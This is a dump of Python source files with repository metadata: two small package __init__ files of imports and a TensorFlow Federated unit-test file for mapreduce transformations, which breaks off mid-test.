Python
|
classifcation/__init__.py
|
JessikaSmith/reviews_classification_and_aspect_extraction
|
457c17363d214e4f674068939b278c760b61b59b
|
[
"MIT"
] | 1
|
2018-11-15T18:03:39.000Z
|
2018-11-15T18:03:39.000Z
|
classifcation/__init__.py
|
JessikaSmith/reviews_classification_and_aspect_extraction
|
457c17363d214e4f674068939b278c760b61b59b
|
[
"MIT"
] | null | null | null |
classifcation/__init__.py
|
JessikaSmith/reviews_classification_and_aspect_extraction
|
457c17363d214e4f674068939b278c760b61b59b
|
[
"MIT"
] | null | null | null |
import classifcation.word2vec_preparation
import classifcation.preprocess_data
import classifcation.model
import classifcation.classification_quality_check
import classifcation.utils
| 36.4
| 49
| 0.923077
| 19
| 182
| 8.631579
| 0.578947
| 0.579268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 0.049451
| 182
| 5
| 50
| 36.4
| 0.942197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9c0169a19a0dc0ce7f1b39bef780f911980939b4
| 201
|
py
|
Python
|
MathFunctions/__init__.py
|
chezzoba/Functions
|
efc20e81dbe78ca1f6931e443715abc948ed7ed8
|
[
"MIT"
] | null | null | null |
MathFunctions/__init__.py
|
chezzoba/Functions
|
efc20e81dbe78ca1f6931e443715abc948ed7ed8
|
[
"MIT"
] | null | null | null |
MathFunctions/__init__.py
|
chezzoba/Functions
|
efc20e81dbe78ca1f6931e443715abc948ed7ed8
|
[
"MIT"
] | null | null | null |
from MathFunctions.Polynomial import Polynomial, Linear
from MathFunctions.Trigonometry import Sin, Cos, sin, cos, tan
from MathFunctions.Exponential import Exponential, Logarithm, ln, log2, log10, exp
| 67
| 82
| 0.830846
| 25
| 201
| 6.68
| 0.6
| 0.305389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016667
| 0.104478
| 201
| 3
| 82
| 67
| 0.911111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9c1144b25e44af1a2b8c1c28f4792ac6506ce97d
| 36,799
|
py
|
Python
|
tensorflow_federated/python/core/backends/mapreduce/transformations_test.py
|
Catherineylp/federated
|
7a5549f3fb0eb2e3b5cdcb4788a8856cbfa17416
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_federated/python/core/backends/mapreduce/transformations_test.py
|
Catherineylp/federated
|
7a5549f3fb0eb2e3b5cdcb4788a8856cbfa17416
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_federated/python/core/backends/mapreduce/transformations_test.py
|
Catherineylp/federated
|
7a5549f3fb0eb2e3b5cdcb4788a8856cbfa17416
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python2, python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import tensorflow as tf
from tensorflow_federated.proto.v0 import computation_pb2
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.api import intrinsics
from tensorflow_federated.python.core.api import placements
from tensorflow_federated.python.core.backends.mapreduce import canonical_form_utils
from tensorflow_federated.python.core.backends.mapreduce import test_utils
from tensorflow_federated.python.core.backends.mapreduce import transformations as mapreduce_transformations
from tensorflow_federated.python.core.impl import computation_constructing_utils
from tensorflow_federated.python.core.impl import computation_wrapper_instances
from tensorflow_federated.python.core.impl import intrinsic_defs
from tensorflow_federated.python.core.impl import transformation_utils
from tensorflow_federated.python.core.impl import transformations
from tensorflow_federated.python.core.impl.compiler import building_block_analysis
from tensorflow_federated.python.core.impl.compiler import building_blocks
from tensorflow_federated.python.core.impl.compiler import tree_analysis
class TransformationsTest(absltest.TestCase):
  """Smoke test that the example computation lowers as expected."""

  def test_example_training_comp_reduces(self):
    """The example iterative process's `next` lowers to a Lambda."""
    training_comp = test_utils.construct_example_training_comp()
    next_as_building_block = test_utils.computation_to_building_block(
        training_comp.next)
    self.assertIsInstance(next_as_building_block, building_blocks.Lambda)
class CheckExtractionResultTest(absltest.TestCase):
  """Tests for `mapreduce_transformations.check_extraction_result`."""

  def test_raises_on_none_args(self):
    """Either argument being None raises TypeError."""
    with self.assertRaisesRegex(TypeError, 'None'):
      mapreduce_transformations.check_extraction_result(
          None, building_blocks.Reference('x', tf.int32))
    with self.assertRaisesRegex(TypeError, 'None'):
      mapreduce_transformations.check_extraction_result(
          building_blocks.Reference('x', tf.int32), None)

  def test_raises_function_and_call(self):
    """A functional first arg paired with a Call raises a compilation error."""
    function = building_blocks.Reference(
        'f', computation_types.FunctionType(tf.int32, tf.int32))
    integer_ref = building_blocks.Reference('x', tf.int32)
    call = building_blocks.Call(function, integer_ref)
    with self.assertRaisesRegex(
        mapreduce_transformations.CanonicalFormCompilationError,
        'we have the functional type'):
      mapreduce_transformations.check_extraction_result(function, call)

  def test_raises_non_function_and_compiled_computation(self):
    """A non-functional first arg vs a compiled computation raises."""
    # Extract a real CompiledComputation from the temperature-sensor
    # example's initialize computation.
    init = canonical_form_utils.get_iterative_process_for_canonical_form(
        test_utils.get_temperature_sensor_example()).initialize
    compiled_computation = (
        test_utils.computation_to_building_block(init).argument.function)
    integer_ref = building_blocks.Reference('x', tf.int32)
    with self.assertRaisesRegex(
        mapreduce_transformations.CanonicalFormCompilationError,
        'we have the non-functional type'):
      mapreduce_transformations.check_extraction_result(integer_ref,
                                                        compiled_computation)

  def test_raises_function_and_compiled_computation_of_different_type(self):
    """Mismatched TFF types between the two arguments raise."""
    init = canonical_form_utils.get_iterative_process_for_canonical_form(
        test_utils.get_temperature_sensor_example()).initialize
    compiled_computation = (
        test_utils.computation_to_building_block(init).argument.function)
    function = building_blocks.Reference(
        'f', computation_types.FunctionType(tf.int32, tf.int32))
    with self.assertRaisesRegex(
        mapreduce_transformations.CanonicalFormCompilationError,
        'incorrect TFF type'):
      mapreduce_transformations.check_extraction_result(function,
                                                        compiled_computation)

  def test_raises_tensor_and_call_to_not_compiled_computation(self):
    """A Call whose function is not compiled raises a 'missing' error."""
    function = building_blocks.Reference(
        'f', computation_types.FunctionType(tf.int32, tf.int32))
    ref_to_int = building_blocks.Reference('x', tf.int32)
    called_fn = building_blocks.Call(function, ref_to_int)
    with self.assertRaisesRegex(
        mapreduce_transformations.CanonicalFormCompilationError, 'missing'):
      mapreduce_transformations.check_extraction_result(ref_to_int, called_fn)

  def test_passes_function_and_compiled_computation_of_same_type(self):
    """Matching types pass the check without raising."""
    init = canonical_form_utils.get_iterative_process_for_canonical_form(
        test_utils.get_temperature_sensor_example()).initialize
    compiled_computation = (
        test_utils.computation_to_building_block(init).argument.function)
    function = building_blocks.Reference('f',
                                         compiled_computation.type_signature)
    mapreduce_transformations.check_extraction_result(function,
                                                      compiled_computation)
class ConsolidateAndExtractTest(absltest.TestCase):
  """Tests for `consolidate_and_extract_local_processing`."""

  def test_raises_on_none(self):
    """None input raises TypeError."""
    with self.assertRaises(TypeError):
      mapreduce_transformations.consolidate_and_extract_local_processing(None)

  def test_raises_reference_to_functional_type(self):
    """A bare Reference of functional type is rejected."""
    function_type = computation_types.FunctionType(tf.int32, tf.int32)
    ref = building_blocks.Reference('x', function_type)
    with self.assertRaisesRegex(ValueError, 'of functional type passed'):
      mapreduce_transformations.consolidate_and_extract_local_processing(ref)

  def test_already_reduced_case(self):
    """An already-reduced computation extracts to a TF CompiledComputation."""
    init = canonical_form_utils.get_iterative_process_for_canonical_form(
        test_utils.get_temperature_sensor_example()).initialize
    comp = test_utils.computation_to_building_block(init)
    result = mapreduce_transformations.consolidate_and_extract_local_processing(
        comp)
    self.assertIsInstance(result, building_blocks.CompiledComputation)
    self.assertIsInstance(result.proto, computation_pb2.Computation)
    self.assertEqual(result.proto.WhichOneof('computation'), 'tensorflow')

  def test_reduces_unplaced_lambda_leaving_type_signature_alone(self):
    """Reducing an identity lambda preserves its type signature."""
    lam = building_blocks.Lambda('x', tf.int32,
                                 building_blocks.Reference('x', tf.int32))
    extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
        lam)
    self.assertIsInstance(extracted_tf, building_blocks.CompiledComputation)
    self.assertEqual(extracted_tf.type_signature, lam.type_signature)

  def test_reduces_unplaced_lambda_to_equivalent_tf(self):
    """The extracted TF computes the same values as the original lambda."""
    lam = building_blocks.Lambda('x', tf.int32,
                                 building_blocks.Reference('x', tf.int32))
    extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
        lam)
    executable_tf = computation_wrapper_instances.building_block_to_computation(
        extracted_tf)
    executable_lam = computation_wrapper_instances.building_block_to_computation(
        lam)
    # Spot-check equivalence on a few integer inputs.
    for k in range(10):
      self.assertEqual(executable_tf(k), executable_lam(k))

  def test_reduces_federated_identity_to_member_identity(self):
    """Federated identity reduces to an identity on the member type."""
    fed_int_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
    lam = building_blocks.Lambda('x', fed_int_type,
                                 building_blocks.Reference('x', fed_int_type))
    extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
        lam)
    self.assertIsInstance(extracted_tf, building_blocks.CompiledComputation)
    unplaced_function_type = computation_types.FunctionType(
        fed_int_type.member, fed_int_type.member)
    self.assertEqual(extracted_tf.type_signature, unplaced_function_type)

  def test_reduces_federated_map_to_equivalent_function(self):
    """federated_map of an identity reduces to the equivalent local fn."""
    lam = building_blocks.Lambda('x', tf.int32,
                                 building_blocks.Reference('x', tf.int32))
    arg = building_blocks.Reference(
        'arg', computation_types.FederatedType(tf.int32, placements.CLIENTS))
    mapped_fn = computation_constructing_utils.create_federated_map_or_apply(
        lam, arg)
    extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
        mapped_fn)
    self.assertIsInstance(extracted_tf, building_blocks.CompiledComputation)
    executable_tf = computation_wrapper_instances.building_block_to_computation(
        extracted_tf)
    executable_lam = computation_wrapper_instances.building_block_to_computation(
        lam)
    for k in range(10):
      self.assertEqual(executable_tf(k), executable_lam(k))

  def test_reduces_federated_apply_to_equivalent_function(self):
    """Same as the federated_map case above, via the map-or-apply helper."""
    lam = building_blocks.Lambda('x', tf.int32,
                                 building_blocks.Reference('x', tf.int32))
    arg = building_blocks.Reference(
        'arg', computation_types.FederatedType(tf.int32, placements.CLIENTS))
    mapped_fn = computation_constructing_utils.create_federated_map_or_apply(
        lam, arg)
    extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
        mapped_fn)
    self.assertIsInstance(extracted_tf, building_blocks.CompiledComputation)
    executable_tf = computation_wrapper_instances.building_block_to_computation(
        extracted_tf)
    executable_lam = computation_wrapper_instances.building_block_to_computation(
        lam)
    for k in range(10):
      self.assertEqual(executable_tf(k), executable_lam(k))

  def test_reduces_federated_value_at_server_to_equivalent_noarg_function(self):
    """federated_value at SERVER reduces to a no-arg fn returning 0."""
    federated_value = intrinsics.federated_value(0, placements.SERVER)._comp
    extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
        federated_value)
    executable_tf = computation_wrapper_instances.building_block_to_computation(
        extracted_tf)
    self.assertEqual(executable_tf(), 0)

  def test_reduces_federated_value_at_clients_to_equivalent_noarg_function(
      self):
    """federated_value at CLIENTS reduces to a no-arg fn returning 0."""
    federated_value = intrinsics.federated_value(0, placements.CLIENTS)._comp
    extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
        federated_value)
    executable_tf = computation_wrapper_instances.building_block_to_computation(
        extracted_tf)
    self.assertEqual(executable_tf(), 0)

  def test_reduces_lambda_returning_empty_tuple_to_tf(self):
    """A lambda returning an empty tuple should reduce (currently skipped)."""
    self.skipTest('Depends on a lower level fix, currently in review.')
    empty_tuple = building_blocks.Tuple([])
    lam = building_blocks.Lambda('x', tf.int32, empty_tuple)
    extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
        lam)
    self.assertIsInstance(extracted_tf, building_blocks.CompiledComputation)
class ForceAlignAndSplitByIntrinsicTest(absltest.TestCase):
  """Tests for `force_align_and_split_by_intrinsic`."""

  def test_returns_comps_with_federated_broadcast(self):
    """Splitting on federated_broadcast yields intrinsic-free halves."""
    iterative_process = test_utils.construct_example_training_comp()
    comp = test_utils.computation_to_building_block(iterative_process.next)
    uri = intrinsic_defs.FEDERATED_BROADCAST.uri
    before, after = mapreduce_transformations.force_align_and_split_by_intrinsic(
        comp, uri)

    def _predicate(comp):
      # True for nodes that are calls to the target intrinsic.
      return building_block_analysis.is_called_intrinsic(comp, uri)

    # The original computation contains 3 broadcast calls; after the
    # split neither half contains any, and the outer types line up.
    self.assertIsInstance(comp, building_blocks.Lambda)
    self.assertEqual(tree_analysis.count(comp, _predicate), 3)
    self.assertIsInstance(before, building_blocks.Lambda)
    self.assertEqual(tree_analysis.count(before, _predicate), 0)
    self.assertEqual(before.parameter_type, comp.parameter_type)
    self.assertIsInstance(after, building_blocks.Lambda)
    self.assertEqual(tree_analysis.count(after, _predicate), 0)
    self.assertEqual(after.result.type_signature, comp.result.type_signature)

  def test_returns_comps_with_federated_aggregate(self):
    """Splitting on federated_aggregate yields intrinsic-free halves."""
    iterative_process = test_utils.construct_example_training_comp()
    comp = test_utils.computation_to_building_block(iterative_process.next)
    uri = intrinsic_defs.FEDERATED_AGGREGATE.uri
    before, after = mapreduce_transformations.force_align_and_split_by_intrinsic(
        comp, uri)

    def _predicate(comp):
      # True for nodes that are calls to the target intrinsic.
      return building_block_analysis.is_called_intrinsic(comp, uri)

    # The original computation contains 2 aggregate calls; after the
    # split neither half contains any, and the outer types line up.
    self.assertIsInstance(comp, building_blocks.Lambda)
    self.assertEqual(tree_analysis.count(comp, _predicate), 2)
    self.assertIsInstance(before, building_blocks.Lambda)
    self.assertEqual(tree_analysis.count(before, _predicate), 0)
    self.assertEqual(before.parameter_type, comp.parameter_type)
    self.assertIsInstance(after, building_blocks.Lambda)
    self.assertEqual(tree_analysis.count(after, _predicate), 0)
    self.assertEqual(after.result.type_signature, comp.result.type_signature)
class ExtractArgumentsTest(absltest.TestCase):
def test_raises_on_none(self):
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
None, [0])
def test_raises_on_non_lambda_comp(self):
ref = building_blocks.Reference('x', [tf.int32])
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
ref, [0])
def test_raises_on_none_selections(self):
lam = building_blocks.Lambda('x', tf.int32,
building_blocks.Reference('x', [tf.int32]))
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, None)
def test_raises_on_selection_tuple(self):
lam = building_blocks.Lambda('x', tf.int32,
building_blocks.Reference('x', [tf.int32]))
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, (0))
def test_raises_on_non_tuple_parameter(self):
lam = building_blocks.Lambda('x', tf.int32,
building_blocks.Reference('x', tf.int32))
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0]])
def test_raises_on_selection_from_non_tuple(self):
lam = building_blocks.Lambda('x', [tf.int32],
building_blocks.Reference('x', [tf.int32]))
with self.assertRaisesRegex(TypeError, 'nonexistent index'):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0, 0]])
def test_raises_on_non_int_index(self):
lam = building_blocks.Lambda(
'x', [tf.int32], building_blocks.Reference('x', [('a', tf.int32)]))
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [['a']])
def test_raises_on_non_federated_selection(self):
lam = building_blocks.Lambda('x', [tf.int32],
building_blocks.Reference('x', [tf.int32]))
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0]])
def test_raises_on_selections_at_different_placements(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
tuple_of_federated_types = computation_types.NamedTupleType(
[fed_at_clients, fed_at_server])
lam = building_blocks.Lambda(
'x', tuple_of_federated_types,
building_blocks.Selection(
building_blocks.Reference('x', tuple_of_federated_types), index=0))
with self.assertRaisesRegex(ValueError, 'at the same placement.'):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0], [1]])
def test_binds_single_element_tuple_to_lower_lambda(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
tuple_of_federated_types = computation_types.NamedTupleType(
[fed_at_clients, fed_at_server])
lam = building_blocks.Lambda(
'x', tuple_of_federated_types,
building_blocks.Selection(
building_blocks.Reference('x', tuple_of_federated_types), index=0))
zeroth_index_extracted = (
mapreduce_transformations
.zip_selection_as_argument_to_lower_level_lambda(lam, [[0]]))
self.assertEqual(zeroth_index_extracted.type_signature, lam.type_signature)
self.assertIsInstance(zeroth_index_extracted, building_blocks.Lambda)
self.assertIsInstance(zeroth_index_extracted.result, building_blocks.Call)
self.assertIsInstance(zeroth_index_extracted.result.function,
building_blocks.Lambda)
self.assertEqual(
str(zeroth_index_extracted.result.function),
'(_var2 -> federated_map(<(_var3 -> _var3[0]),_var2>))')
self.assertEqual(
str(zeroth_index_extracted.result.argument),
'federated_map(<(_var4 -> <_var4>),<_var1[0]>[0]>)')
def test_binds_single_argument_to_lower_lambda(self):
  """bind_single_selection_... produces an identity inner lambda over x[0]."""
  clients_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
  server_type = computation_types.FederatedType(tf.int32, placements.SERVER)
  param_type = computation_types.NamedTupleType([clients_type, server_type])
  lam = building_blocks.Lambda(
      'x', param_type,
      building_blocks.Selection(
          building_blocks.Reference('x', param_type), index=0))
  zeroth_index_extracted = (
      mapreduce_transformations
      .bind_single_selection_as_argument_to_lower_level_lambda(lam, 0))
  self.assertEqual(zeroth_index_extracted.type_signature, lam.type_signature)
  self.assertIsInstance(zeroth_index_extracted, building_blocks.Lambda)
  result = zeroth_index_extracted.result
  self.assertIsInstance(result, building_blocks.Call)
  self.assertIsInstance(result.function, building_blocks.Lambda)
  # Inner function is an identity whose exact variable name is not pinned.
  self.assertRegex(str(result.function), r'\((.{4})1 -> (\1)1\)')
  self.assertEqual(str(result.argument), '_var1[0]')
def test_binding_single_arg_leaves_no_unbound_references(self):
  """The rewritten lambda is closed: no references escape unbound."""
  clients_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
  server_type = computation_types.FederatedType(tf.int32, placements.SERVER)
  param_type = computation_types.NamedTupleType([clients_type, server_type])
  lam = building_blocks.Lambda(
      'x', param_type,
      building_blocks.Selection(
          building_blocks.Reference('x', param_type), index=0))
  rewritten = (
      mapreduce_transformations
      .zip_selection_as_argument_to_lower_level_lambda(lam, [[0]]))
  unbound = transformations.get_map_of_unbound_references(rewritten)[rewritten]
  self.assertEmpty(unbound)
def test_binds_single_arg_deep_in_type_tree_to_lower_lambda(self):
  """A selection two levels deep ([0][0]) is zipped into the inner lambda."""
  clients_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
  server_type = computation_types.FederatedType(tf.int32, placements.SERVER)
  param_type = computation_types.NamedTupleType([[clients_type], server_type])
  nested_selection = building_blocks.Selection(
      building_blocks.Selection(
          building_blocks.Reference('x', param_type), index=0),
      index=0)
  lam = building_blocks.Lambda('x', param_type, nested_selection)
  extracted = (
      mapreduce_transformations
      .zip_selection_as_argument_to_lower_level_lambda(lam, [[0, 0]]))
  self.assertEqual(extracted.type_signature, lam.type_signature)
  self.assertIsInstance(extracted, building_blocks.Lambda)
  result = extracted.result
  self.assertIsInstance(result, building_blocks.Call)
  self.assertIsInstance(result.function, building_blocks.Lambda)
  self.assertEqual(
      str(result.function),
      '(_var2 -> federated_map(<(_var3 -> _var3[0]),_var2>))')
  # The call argument wraps the deeply-selected federated value in a
  # singleton tuple before handing it to the inner lambda above.
  self.assertEqual(
      str(result.argument),
      'federated_map(<(_var4 -> <_var4>),<_var1[0][0]>[0]>)')
def test_binds_multiple_args_deep_in_type_tree_to_lower_lambda(self):
  """Two deep selections are zipped together and bound to one inner lambda."""
  clients_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
  server_type = computation_types.FederatedType(tf.int32, placements.SERVER)
  param_type = computation_types.NamedTupleType(
      [[clients_type], server_type, [clients_type]])
  param_ref = building_blocks.Reference('x', param_type)
  first_selection = building_blocks.Selection(
      building_blocks.Selection(param_ref, index=0), index=0)
  second_selection = building_blocks.Selection(
      building_blocks.Selection(param_ref, index=2), index=0)
  lam = building_blocks.Lambda(
      'x', param_type,
      building_blocks.Tuple([first_selection, second_selection]))
  extracted = (
      mapreduce_transformations
      .zip_selection_as_argument_to_lower_level_lambda(lam, [[0, 0], [2, 0]]))
  self.assertEqual(extracted.type_signature, lam.type_signature)
  self.assertIsInstance(extracted, building_blocks.Lambda)
  result = extracted.result
  self.assertIsInstance(result, building_blocks.Call)
  self.assertIsInstance(result.function, building_blocks.Lambda)
  self.assertEqual(
      str(result.function),
      '(_var2 -> <federated_map(<(_var3 -> _var3[0]),_var2>),'
      'federated_map(<(_var4 -> _var4[1]),_var2>)>)')
  self.assertEqual(
      str(result.argument),
      'federated_map(<(_var5 -> <_var5[0],_var5[1]>),federated_map(<(_var6 -> _var6),(let _var7=<_var1[0][0],_var1[2][0]> in federated_zip_at_clients(<_var7[0],_var7[1]>))>)>)'
  )
def test_binding_multiple_args_results_in_unique_names(self):
  """All bound variables introduced by the rewrite carry distinct names."""
  clients_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
  server_type = computation_types.FederatedType(tf.int32, placements.SERVER)
  param_type = computation_types.NamedTupleType(
      [[clients_type], server_type, [clients_type]])
  param_ref = building_blocks.Reference('x', param_type)
  first_selection = building_blocks.Selection(
      building_blocks.Selection(param_ref, index=0), index=0)
  second_selection = building_blocks.Selection(
      building_blocks.Selection(param_ref, index=2), index=0)
  lam = building_blocks.Lambda(
      'x', param_type,
      building_blocks.Tuple([first_selection, second_selection]))
  extracted = (
      mapreduce_transformations
      .zip_selection_as_argument_to_lower_level_lambda(lam, [[0, 0], [2, 0]]))
  tree_analysis.check_has_unique_names(extracted)
class SelectFederatedOutputFromLambdaTest(absltest.TestCase):
  """Tests for mapreduce_transformations.select_output_from_lambda."""

  def _identity_lambda(self, type_spec):
    """Build the identity lambda (x -> x) over the given parameter type."""
    ref = building_blocks.Reference('x', type_spec)
    return building_blocks.Lambda('x', ref.type_signature, ref)

  def test_raises_on_none(self):
    with self.assertRaises(TypeError):
      mapreduce_transformations.select_output_from_lambda(None, 0)

  def test_raises_on_non_lambda(self):
    fed_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
    non_lambda = building_blocks.Reference('x', [fed_type])
    with self.assertRaises(TypeError):
      mapreduce_transformations.select_output_from_lambda(non_lambda, 0)

  def test_raises_on_string_indices(self):
    fed_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
    lam = self._identity_lambda([('a', fed_type)])
    with self.assertRaises(TypeError):
      mapreduce_transformations.select_output_from_lambda(lam, 'a')

  def test_raises_on_list_of_strings(self):
    fed_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
    lam = self._identity_lambda([[('a', fed_type)]])
    with self.assertRaises(TypeError):
      mapreduce_transformations.select_output_from_lambda(lam, ['a'])

  def test_selects_single_federated_output(self):
    clients_type = computation_types.FederatedType(tf.int32,
                                                   placements.CLIENTS)
    server_type = computation_types.FederatedType(tf.int32, placements.SERVER)
    lam = self._identity_lambda([clients_type, server_type])
    zero_selected = mapreduce_transformations.select_output_from_lambda(lam, 0)
    self.assertEqual(zero_selected.type_signature.parameter,
                     lam.type_signature.parameter)
    self.assertEqual(zero_selected.type_signature.result,
                     lam.type_signature.result[0])
    self.assertEqual(str(zero_selected), '(x -> (let _var1=x in _var1[0]))')

  def test_selects_tuple_of_federated_outputs(self):
    clients_type = computation_types.FederatedType(tf.int32,
                                                   placements.CLIENTS)
    server_type = computation_types.FederatedType(tf.int32, placements.SERVER)
    lam = self._identity_lambda([clients_type, clients_type, server_type])
    tuple_selected = mapreduce_transformations.select_output_from_lambda(
        lam, (0, 1))
    expected_result_type = computation_types.NamedTupleType(
        [lam.type_signature.result[0], lam.type_signature.result[1]])
    self.assertEqual(tuple_selected.type_signature.parameter,
                     lam.type_signature.parameter)
    self.assertEqual(tuple_selected.type_signature.result,
                     expected_result_type)
    self.assertEqual(
        str(tuple_selected), '(x -> (let _var1=x in <_var1[0],_var1[1]>))')

  def test_selects_list_of_federated_outputs(self):
    clients_type = computation_types.FederatedType(tf.int32,
                                                   placements.CLIENTS)
    server_type = computation_types.FederatedType(tf.int32, placements.SERVER)
    lam = self._identity_lambda([clients_type, clients_type, server_type])
    tuple_selected = mapreduce_transformations.select_output_from_lambda(
        lam, [0, 1])
    expected_result_type = computation_types.NamedTupleType(
        [lam.type_signature.result[0], lam.type_signature.result[1]])
    self.assertEqual(tuple_selected.type_signature.parameter,
                     lam.type_signature.parameter)
    self.assertEqual(tuple_selected.type_signature.result,
                     expected_result_type)
    self.assertEqual(
        str(tuple_selected), '(x -> (let _var1=x in <_var1[0],_var1[1]>))')

  def test_selects_single_unplaced_output(self):
    lam = self._identity_lambda([tf.int32, tf.float32, tf.int32])
    int_selected = mapreduce_transformations.select_output_from_lambda(lam, 0)
    self.assertEqual(int_selected.type_signature.parameter,
                     lam.type_signature.parameter)
    self.assertEqual(int_selected.type_signature.result,
                     lam.type_signature.result[0])

  def test_selects_multiple_unplaced_outputs(self):
    lam = self._identity_lambda([tf.int32, tf.float32, tf.int32])
    tuple_selected = mapreduce_transformations.select_output_from_lambda(
        lam, [0, 1])
    expected_result_type = computation_types.NamedTupleType(
        [lam.type_signature.result[0], lam.type_signature.result[1]])
    self.assertEqual(tuple_selected.type_signature.parameter,
                     lam.type_signature.parameter)
    self.assertEqual(tuple_selected.type_signature.result,
                     expected_result_type)
    self.assertEqual(
        str(tuple_selected), '(x -> (let _var1=x in <_var1[0],_var1[1]>))')
class ConcatenateFunctionOutputsTest(absltest.TestCase):
  """Tests for mapreduce_transformations.concatenate_function_outputs."""

  def test_raises_on_non_lambda_args(self):
    ref = building_blocks.Reference('x', tf.int32)
    identity = building_blocks.Lambda('x', tf.int32, ref)
    # Both argument positions must reject non-lambda inputs.
    for first, second in [(identity, ref), (ref, identity)]:
      with self.assertRaises(TypeError):
        mapreduce_transformations.concatenate_function_outputs(first, second)

  def test_raises_on_non_unique_names(self):
    ref = building_blocks.Reference('x', tf.int32)
    inner_lambda = building_blocks.Lambda('x', tf.int32, ref)
    shadowing_lambda = building_blocks.Lambda('x', tf.int32, inner_lambda)
    for first, second in [(inner_lambda, shadowing_lambda),
                          (shadowing_lambda, inner_lambda)]:
      with self.assertRaises(ValueError):
        mapreduce_transformations.concatenate_function_outputs(first, second)

  def test_raises_on_different_parameter_types(self):
    int_identity = building_blocks.Lambda(
        'x', tf.int32, building_blocks.Reference('x', tf.int32))
    float_identity = building_blocks.Lambda(
        'x', tf.float32, building_blocks.Reference('x', tf.float32))
    with self.assertRaises(TypeError):
      mapreduce_transformations.concatenate_function_outputs(
          int_identity, float_identity)

  def test_parameters_are_mapped_together(self):
    x_identity = building_blocks.Lambda(
        'x', tf.int32, building_blocks.Reference('x', tf.int32))
    y_identity = building_blocks.Lambda(
        'y', tf.int32, building_blocks.Reference('y', tf.int32))
    concatenated = mapreduce_transformations.concatenate_function_outputs(
        x_identity, y_identity)
    parameter_name = concatenated.parameter_name

    def _raise_on_other_name_reference(comp):
      # Any reference not renamed to the shared parameter is an error.
      if isinstance(comp, building_blocks.Reference) and (
          comp.name != parameter_name):
        raise ValueError
      return comp, True

    tree_analysis.check_has_unique_names(concatenated)
    transformation_utils.transform_postorder(concatenated,
                                             _raise_on_other_name_reference)

  def test_concatenates_identities(self):
    x_identity = building_blocks.Lambda(
        'x', tf.int32, building_blocks.Reference('x', tf.int32))
    y_identity = building_blocks.Lambda(
        'y', tf.int32, building_blocks.Reference('y', tf.int32))
    concatenated = mapreduce_transformations.concatenate_function_outputs(
        x_identity, y_identity)
    self.assertEqual(str(concatenated), '(_var1 -> <_var1,_var1>)')
class NormalizedBitTest(absltest.TestCase):
  """Tests for mapreduce_transformations.normalize_all_equal_bit."""

  def test_raises_on_none(self):
    with self.assertRaises(TypeError):
      mapreduce_transformations.normalize_all_equal_bit(None)

  def test_converts_all_equal_at_clients_reference_to_not_equal(self):
    all_equal_clients = computation_types.FederatedType(
